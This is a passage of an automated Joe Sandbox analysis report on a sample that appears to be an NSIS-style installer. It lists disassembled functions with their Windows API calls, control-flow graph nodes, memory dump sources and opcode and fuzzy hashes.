                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp
                                                          • API String ID: 2655323295-2425982580
                                                          • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                          • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                          • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                          • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 840 405f0d-405f19 841 405f1a-405f4e GetTickCount GetTempFileNameW 840->841 842 405f50-405f52 841->842 843 405f5d-405f5f 841->843 842->841 844 405f54 842->844 845 405f57-405f5a 843->845 844->845
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405F2B
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF), ref: 00405F46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-386316673
                                                          • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                          • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 846 402d44-402d6d call 406255 848 402d72-402d74 846->848 849 402d76-402d7c 848->849 850 402dec-402df0 848->850 851 402d98-402dad RegEnumKeyW 849->851 852 402d7e-402d80 851->852 853 402daf-402dc1 RegCloseKey call 4067c2 851->853 854 402dd0-402dde RegCloseKey 852->854 855 402d82-402d96 call 402d44 852->855 860 402de0-402de6 RegDeleteKeyW 853->860 861 402dc3-402dce 853->861 854->850 855->851 855->853 860->850 861->850
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                          • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                          • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                          • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 863 40591f-40596a CreateDirectoryW 864 405970-40597d GetLastError 863->864 865 40596c-40596e 863->865 866 405997-405999 864->866 867 40597f-405993 SetFileSecurityW 864->867 865->866 867->865 868 405995 GetLastError 867->868 868->866
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                          • GetLastError.KERNEL32 ref: 00405976
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                          • GetLastError.KERNEL32 ref: 00405995
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID:
                                                          • API String ID: 3449924974-0
                                                          • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                          • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                          • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                          • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004053F3
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                            • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                          • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                          • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                          • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                          • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                          • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                          • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                          • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                          • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                          • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                          • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                          • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                          • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                          • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                          • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                          • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                          • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                          • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                          • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                          • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                          • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                          • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                          • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                          • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                          • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                          • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                          • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                          • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004032F2
                                                            • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                          • SetFilePointer.KERNELBASE(0015F89E,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FilePointer$CountTick
                                                          • String ID:
                                                          • API String ID: 1092082344-0
                                                          • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                          • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                          • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                          • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                          • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                          • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                          • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                          APIs
                                                          • GlobalFree.KERNEL32(004E1B58), ref: 00401BE7
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
